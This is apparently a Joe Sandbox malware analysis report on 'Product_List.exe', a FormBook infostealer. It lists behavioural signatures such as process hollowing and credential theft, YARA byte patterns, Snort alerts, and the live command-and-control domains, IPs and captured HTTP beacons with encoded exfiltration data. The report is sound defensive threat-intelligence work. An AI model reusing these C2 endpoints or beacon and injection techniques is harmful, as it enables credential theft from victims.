Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Product_List.exe

Overview

General Information

Sample Name:Product_List.exe
Analysis ID:870350
MD5:99a12ce4a1c70ef4268d828b018bcbf6
SHA1:31eade1627cd235f7790806ac56d8da1dcb788a8
SHA256:04e338b306c1f8ae3c2025bfa779a5926f0432270792db5acb944e486c7893a5
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • Product_List.exe (PID: 7124 cmdline: C:\Users\user\Desktop\Product_List.exe MD5: 99A12CE4A1C70EF4268D828B018BCBF6)
    • Product_List.exe (PID: 5788 cmdline: C:\Users\user\Desktop\Product_List.exe MD5: 99A12CE4A1C70EF4268D828B018BCBF6)
    • Product_List.exe (PID: 5832 cmdline: C:\Users\user\Desktop\Product_List.exe MD5: 99A12CE4A1C70EF4268D828B018BCBF6)
      • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 4704 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.811143873.0000000000850000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.811143873.0000000000850000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x182b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000005.00000002.811143873.0000000000850000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x180b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17b51:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x181b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1832f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa9fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16d9c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1dde7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ed9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.812010845.0000000000C90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.812010845.0000000000C90000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1f040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x182b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 10 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.Product_List.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        3.2.Product_List.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x1fff3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbde2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1926a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        3.2.Product_List.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19068:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18b04:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1916a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x192e2:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xb9ad:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17d4f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1ed9a:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1fd4d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.Product_List.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.Product_List.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x20df3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xcbe2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1a06a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.4130.185.109.7749697802031453 05/19/23-17:51:10.548851
          SID:2031453
          Source Port:49697
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4130.185.109.7749697802031412 05/19/23-17:51:10.548851
          SID:2031412
          Source Port:49697
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4130.185.109.7749697802031449 05/19/23-17:51:10.548851
          SID:2031449
          Source Port:49697
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: Product_List.exeReversingLabs: Detection: 29%
          Source: Product_List.exeVirustotal: Detection: 26%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.Product_List.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.Product_List.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.811143873.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.812010845.0000000000C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.810909300.0000000000780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.620980229.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.jhg61.com/bpg5/?JBfKk=_uLb4J-vJhW8&8mBWmPn=pOb1wbOKbC6m5caeF5Aq0gkUNx4nmyAvira URL Cloud: Label: malware
          Source: http://rt66omm.com/bpg5/?8mBWmPn=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVfAvira URL Cloud: Label: malware
          Source: http://www.vns96.net/bpg5/www.vns96.netJBfKk=_uLb4J-vJhW8Avira URL Cloud: Label: malware
          Source: http://www.mysparexrewards.comAvira URL Cloud: Label: malware
          Source: http://www.techwithsun.com/bpg5/www.techwithsun.comAvira URL Cloud: Label: malware
          Source: http://www.thetowerbells.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.wearecatalyst.app/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.haynicorpon.bizAvira URL Cloud: Label: malware
          Source: http://www.berlinhealthweek.com/bpg5/?JBfKk=_uLb4J-vJhW8&8mBWmPn=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA==Avira URL Cloud: Label: malware
          Source: http://www.gomarketing.infoAvira URL Cloud: Label: malware
          Source: http://www.antalyabfe.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.mysparexrewards.com/bpg5/www.mysparexrewards.comJBfKk=_uLb4J-vJhW8Avira URL Cloud: Label: malware
          Source: http://www.gomarketing.info/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.antalyabfe.com/bpg5/www.antalyabfe.comJBfKk=_uLb4J-vJhW8Avira URL Cloud: Label: malware
          Source: http://www.berlinhealthweek.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.jhg61.com/bpg5/www.jhg61.comJBfKk=_uLb4J-vJhW8Avira URL Cloud: Label: malware
          Source: http://www.haynicorpon.biz/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.mysparexrewards.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.haynicorpon.biz/bpg5/www.haynicorpon.bizJBfKk=_uLb4J-vJhW8Avira URL Cloud: Label: malware
          Source: http://www.berlinhealthweek.comAvira URL Cloud: Label: malware
          Source: http://www.rt66omm.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.techwithsun.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.thetowerbells.com/bpg5/www.thetowerbells.comJBfKk=_uLb4J-vJhW8Avira URL Cloud: Label: malware
          Source: http://www.gomarketing.info/bpg5/www.gomarketing.infoJBfKk=_uLb4J-vJhW8Avira URL Cloud: Label: malware
          Source: http://www.rt66omm.com/bpg5/?8mBWmPn=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf+c4mV5kUnhNlslOlX/mHpTHfJOtj0AP0RUV6kopxuhfKJOii3EjlU32Tg==&JBfKk=_uLb4J-vJhW8Avira URL Cloud: Label: malware
          Source: http://www.musicandgros.com/bpg5/?8mBWmPn=uI0ZFUbwVRIi3DiTUWHSZHrFFI2HorjHoi3n5y+9yD11xIHk/3oSwa67JMF5g0hIgFLJJ/T32HS+nao4IUwTEx2mn7HsaAaANg==&JBfKk=_uLb4J-vJhW8Avira URL Cloud: Label: malware
          Source: http://www.musicandgros.com/bpg5/www.musicandgros.comJBfKk=_uLb4J-vJhW8Avira URL Cloud: Label: malware
          Source: http://www.techwithsun.comAvira URL Cloud: Label: malware
          Source: http://www.jhg61.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.42230.org/bpg5/www.42230.orgJBfKk=_uLb4J-vJhW8Avira URL Cloud: Label: malware
          Source: http://www.wearecatalyst.app/bpg5/www.wearecatalyst.appJBfKk=_uLb4J-vJhW8Avira URL Cloud: Label: malware
          Source: http://www.vns96.net/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.rt66omm.com/bpg5/www.rt66omm.comJBfKk=_uLb4J-vJhW8Avira URL Cloud: Label: malware
          Source: http://www.musicandgros.comAvira URL Cloud: Label: malware
          Source: http://www.gomarketing.info/bpg5/?JBfKk=_uLb4J-vJhW8&8mBWmPn=OwAgxHaVYkl+UI18XY1Iu2qsJ2+BnYEEJmaPOWExZbQGVS9XznV4LKZeojJXv/IuTBIyuONpXNM2+QSJdDCPUstET1IBoTg95Q==Avira URL Cloud: Label: malware
          Source: http://www.fabricadepack.fun/bpg5/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: www.gomarketing.infoVirustotal: Detection: 7%Perma Link
          Machine Learning detection for sample
          Source: Product_List.exeJoe Sandbox ML: detected
          Source: Product_List.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Product_List.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000004.00000000.608173495.00007FF883751000.00000020.00000001.01000000.0000000B.sdmp
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000004.00000000.608173495.00007FF883751000.00000020.00000001.01000000.0000000B.sdmp
          Source: Binary string: nlWp.pdbSHA256 source: Product_List.exe
          Source: Binary string: nlWp.pdb source: Product_List.exe
          Source: Binary string: wntdll.pdbUGP source: Product_List.exe, 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Product_List.exe, 00000003.00000003.582527719.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.812467954.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.812467954.00000000030AF000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.620988497.0000000000B5B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.623010577.0000000002DF6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cmd.pdbUGP source: Product_List.exe, 00000003.00000003.620046194.0000000001250000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000003.00000002.621298491.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.812197296.0000000000D90000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Product_List.exe, Product_List.exe, 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Product_List.exe, 00000003.00000003.582527719.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.812467954.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.812467954.00000000030AF000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.620988497.0000000000B5B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.623010577.0000000002DF6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: eex.pdb source: explorer.exe, 00000004.00000000.608173495.00007FF883751000.00000020.00000001.01000000.0000000B.sdmp
          Source: Binary string: cmd.pdb source: Product_List.exe, 00000003.00000003.620046194.0000000001250000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000003.00000002.621298491.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.812197296.0000000000D90000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 4x nop then jmp 09F075B5h0_2_09F069E8

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 130.185.109.77 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.berlinhealthweek.com
          Source: C:\Windows\explorer.exeDomain query: www.gomarketing.info
          Source: C:\Windows\explorer.exeDomain query: www.antalyabfe.com
          Source: C:\Windows\explorer.exeDomain query: www.rt66omm.com
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.7 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.93 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.177.124.57 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.musicandgros.com
          Source: C:\Windows\explorer.exeNetwork Connect: 118.27.125.172 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.jhg61.com
          Source: C:\Windows\explorer.exeNetwork Connect: 183.90.228.46 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 150.129.40.9 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.haynicorpon.biz
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 130.185.109.77:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 130.185.109.77:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 130.185.109.77:80
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /bpg5/?JBfKk=_uLb4J-vJhW8&8mBWmPn=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA== HTTP/1.1Host: www.berlinhealthweek.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?8mBWmPn=uI0ZFUbwVRIi3DiTUWHSZHrFFI2HorjHoi3n5y+9yD11xIHk/3oSwa67JMF5g0hIgFLJJ/T32HS+nao4IUwTEx2mn7HsaAaANg==&JBfKk=_uLb4J-vJhW8 HTTP/1.1Host: www.musicandgros.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?JBfKk=_uLb4J-vJhW8&8mBWmPn=OwAgxHaVYkl+UI18XY1Iu2qsJ2+BnYEEJmaPOWExZbQGVS9XznV4LKZeojJXv/IuTBIyuONpXNM2+QSJdDCPUstET1IBoTg95Q== HTTP/1.1Host: www.gomarketing.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?8mBWmPn=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3+/6Hi4oy4/NY/ls48/wyDTU/1Lw4jGnZUoaombkiQgI/8XP3QjR+DEcO6R3g==&JBfKk=_uLb4J-vJhW8 HTTP/1.1Host: www.antalyabfe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?8mBWmPn=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf+c4mV5kUnhNlslOlX/mHpTHfJOtj0AP0RUV6kopxuhfKJOii3EjlU32Tg==&JBfKk=_uLb4J-vJhW8 HTTP/1.1Host: www.rt66omm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 188.114.97.7 188.114.97.7
          Source: Joe Sandbox ViewIP Address: 188.114.97.7 188.114.97.7
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.musicandgros.comConnection: closeContent-Length: 1485Cache-Control: no-cacheOrigin: http://www.musicandgros.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.musicandgros.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 6d 42 57 6d 50 6e 3d 6a 4b 63 35 47 6b 6d 71 51 57 4a 65 6b 44 6d 6a 63 53 66 41 63 67 6e 32 66 71 36 44 6c 65 33 4f 74 7a 50 52 32 51 79 54 78 32 6f 72 32 35 62 70 30 43 59 42 35 72 53 5a 46 4e 68 65 6a 31 4a 6f 70 55 7a 30 56 76 6e 31 79 45 32 7a 67 4d 52 69 56 67 59 4c 42 46 53 6c 71 37 28 71 65 77 37 6b 50 6d 5a 52 32 51 35 39 7e 37 62 6f 58 79 62 78 4c 54 35 52 4c 37 72 4c 4d 56 6b 55 39 38 4e 4d 45 59 4a 36 7a 39 50 6f 67 57 38 54 55 50 72 47 70 6b 38 30 72 30 68 35 4e 54 46 4b 53 42 44 65 77 56 70 2d 7a 6b 62 75 34 6d 52 75 48 58 6f 42 61 74 41 6c 30 70 70 4d 50 33 30 42 32 5a 33 45 72 77 57 6d 6d 32 41 39 54 30 41 2d 7e 70 6a 53 55 68 28 4a 58 4c 4a 2d 62 54 4b 57 6a 43 4e 45 4c 78 7e 6b 6a 57 69 6b 45 64 6c 41 72 39 76 67 61 69 41 6e 45 30 59 70 68 45 65 72 58 70 32 6c 58 64 77 35 45 45 4e 53 4e 68 72 31 59 4c 74 6d 73 56 79 37 70 54 6f 59 56 34 37 42 38 67 31 53 45 32 6b 42 6c 4c 37 54 44 79 6b 44 74 4b 46 36 61 44 79 6e 69 6a 66 53 39 38 35 31 43 7a 75 72 70 6b 79 6f 39 39 36 65 76 64 78 79 65 4a 37 58 35 4f 41 53 6a 5f 34 6e 4c 6c 35 45 55 62 63 76 47 32 44 4b 4e 48 7e 43 38 76 35 4f 52 36 74 58 30 42 30 79 63 4b 44 57 6b 4a 41 4c 71 77 50 57 6e 31 67 44 44 65 67 2d 76 53 67 4f 65 55 28 41 4b 67 42 56 4b 48 70 4f 64 5f 38 41 28 4f 56 6c 65 56 41 76 6e 32 33 30 54 4f 30 6c 52 51 6c 37 69 76 37 61 6e 36 35 79 6d 68 77 64 70 72 39 33 51 4e 33 34 32 75 54 39 37 50 50 5f 7e 41 53 33 57 73 4d 57 54 39 55 6c 52 75 6b 58 49 45 6a 4c 7e 57 73 49 68 73 43 51 4f 47 45 54 78 71 6c 44 4f 69 50 79 4c 37 64 32 4d 67 79 43 7a 5a 44 38 4a 39 63 76 68 36 73 65 36 42 74 6f 51 46 44 76 74 57 4b 73 74 74 33 78 39 38 49 58 49 35 59 36 45 51 79 47 72 33 61 65 42 64 41 6d 50 78 74 62 30 70 6c 4a 4d 4b 56 73 71 6c 61 42 75 6c 30 2d 73 47 54 33 79 2d 49 34 67 6c 79 6f 67 75 71 4f 34 54 6d 4f 42 48 66 4f 63 72 46 76 39 68 6d 31 71 30 39 78 4a 67 28 64 35 38 45 67 4d 62 61 37 4a 4f 71 6b 61 6c 74 72 43 42 78 59 42 4a 46 58 32 4d 65 67 4c 70 38 73 31 77 52 4e 28 4e 6c 53 71 44 39 63 6f 79 46 6b 47 33 37 33 55 52 4f 74 46 4d 4d 66 6d 4f 34 38 32 72 4a 76 68 6d 70 56 7e 66 50 71 7a 35 53 78 55 71 56 51 63 63 51 51 56 34 41 54 55 7a 62 62 4b 4a 6e 6b 4a 2d 77 59 7e 6e 68 49 32 2d 56 4b 49 61 50 30 48 4c 46 6b 36 6b 38 5a 48 4d 52 31 28 46 44 4e 38 37 6b 47 71 35 45 52 76 69 78 2d 6c 6d 50 6c 65 45 4c 7a 78 67 58 7a 7a 79 70 6a 43 68 72 46 53 68 49 38 70 30 4f 51 38 34 76 62 31 42 43 64 54 31 57 58 33 51 46 62 73 6a 51 63 4d 73 7a 73 73 4f 70 75 68 61 72 5f 4c 51 5a 44 68 76 50 54 51 75 70 4c 6f 6b 72 39 50 47 6e 58 56 63 65 75 34 48 7e 66 41 52 4f 6c 32 71 6
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.musicandgros.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.musicandgros.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.musicandgros.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 6d 42 57 6d 50 6e 3d 6a 4b 63 35 47 6b 6d 71 51 57 4a 65 6b 45 47 6a 63 44 66 41 65 41 6e 32 52 4b 36 44 75 2d 33 79 74 7a 44 7a 32 52 33 65 78 68 38 72 33 6f 48 70 31 77 77 42 7e 72 53 61 4e 74 68 61 7e 46 49 31 70 55 7a 43 56 76 72 31 79 45 79 7a 68 70 56 69 63 45 4d 49 63 6c 53 72 7e 4c 28 33 65 77 32 51 50 6d 56 37 32 55 42 39 7e 36 33 6f 51 78 7a 78 41 52 68 52 50 4c 72 4e 64 31 6b 59 39 38 41 49 45 63 55 33 7a 39 6a 6f 67 6e 67 54 56 65 4c 47 28 6a 67 30 38 6b 68 30 47 44 45 36 55 79 53 72 38 6e 6b 32 30 58 28 66 34 51 6f 6a 43 6b 31 6a 4d 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 8mBWmPn=jKc5GkmqQWJekEGjcDfAeAn2RK6Du-3ytzDz2R3exh8r3oHp1wwB~rSaNtha~FI1pUzCVvr1yEyzhpVicEMIclSr~L(3ew2QPmV72UB9~63oQxzxARhRPLrNd1kY98AIEcU3z9jogngTVeLG(jg08kh0GDE6UySr8nk20X(f4QojCk1jMg).
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.gomarketing.infoConnection: closeContent-Length: 1485Cache-Control: no-cacheOrigin: http://www.gomarketing.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gomarketing.info/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 6d 42 57 6d 50 6e 3d 44 79 6f 41 79 78 62 48 57 46 78 78 41 5a 4e 31 53 50 70 76 38 6e 57 4b 56 48 75 41 70 4b 6b 74 44 45 57 2d 59 55 34 5f 4a 61 68 66 4d 68 78 48 7a 43 30 46 4f 59 4e 65 6f 6a 64 54 6b 63 55 66 52 31 4e 77 76 5f 49 77 61 59 73 32 6f 51 54 2d 4b 6b 32 62 63 63 4a 30 4b 53 67 73 76 6a 45 74 77 6f 35 6e 4d 4d 7a 64 6f 41 6d 51 54 4d 48 36 37 66 57 55 78 41 50 59 53 5f 51 6e 70 59 47 65 38 54 48 47 74 63 58 45 54 61 41 62 7a 59 33 2d 6a 62 57 46 46 6a 6c 64 68 46 36 42 33 6b 45 71 78 45 4e 51 4e 67 52 76 35 6a 46 79 42 4d 33 6d 70 4c 4b 61 69 50 52 41 69 32 6d 2d 31 63 64 39 76 74 78 72 6f 77 56 67 75 42 61 4c 5a 59 52 6c 4d 78 64 45 37 74 34 35 42 57 43 5f 38 57 44 31 7a 68 38 54 6a 34 7e 39 47 64 49 79 41 6d 6a 4f 35 41 68 67 74 69 42 39 59 55 57 71 55 41 42 4b 34 70 35 4b 30 66 55 37 73 46 41 78 31 64 79 46 45 52 52 54 52 78 67 6f 6c 6d 4c 2d 6f 67 7a 39 71 77 67 7a 4a 66 47 62 4f 51 5a 52 57 69 31 61 69 30 44 66 45 6a 79 6a 54 52 61 78 52 43 73 5a 71 63 4a 72 28 62 39 4c 65 59 64 77 73 67 4a 4f 30 77 4d 4c 79 78 4d 35 79 75 43 34 59 6f 73 58 75 50 43 48 7a 51 4b 30 6b 4f 4f 43 4f 7a 4f 74 62 41 54 6e 41 51 56 47 59 70 45 66 59 6f 75 73 4c 35 6b 6b 51 41 35 55 39 67 67 6b 75 30 53 42 53 6f 6a 68 55 67 6c 73 66 69 6e 72 34 56 6c 63 6a 44 55 34 30 59 46 47 30 69 37 71 53 39 65 41 33 71 51 7a 76 31 58 75 57 63 6f 67 65 4d 62 4b 33 69 65 76 78 38 37 56 33 76 41 48 5a 4d 67 57 58 56 6c 56 47 71 32 6b 78 56 28 77 49 39 55 36 51 76 6a 59 48 6f 37 34 39 73 59 49 4f 59 36 77 59 5a 56 64 76 79 63 4f 71 41 6f 78 63 4f 72 55 30 6c 45 65 34 72 6e 42 58 79 52 64 42 68 77 79 5a 74 6c 4f 70 79 50 5f 7e 6f 41 43 41 74 61 2d 79 48 4d 52 7a 36 69 55 79 53 49 58 41 44 52 44 44 78 45 35 74 45 45 5f 74 41 77 51 72 41 47 4e 59 52 62 4c 55 5a 31 39 7e 5f 6c 6a 4e 47 74 30 56 73 55 57 6a 68 67 31 49 5a 4f 77 52 54 73 31 43 62 4f 49 50 79 64 34 4f 4b 39 52 55 37 79 4e 73 4a 6f 43 52 43 68 48 34 75 28 48 79 7a 36 4a 39 56 43 30 57 70 33 76 59 43 62 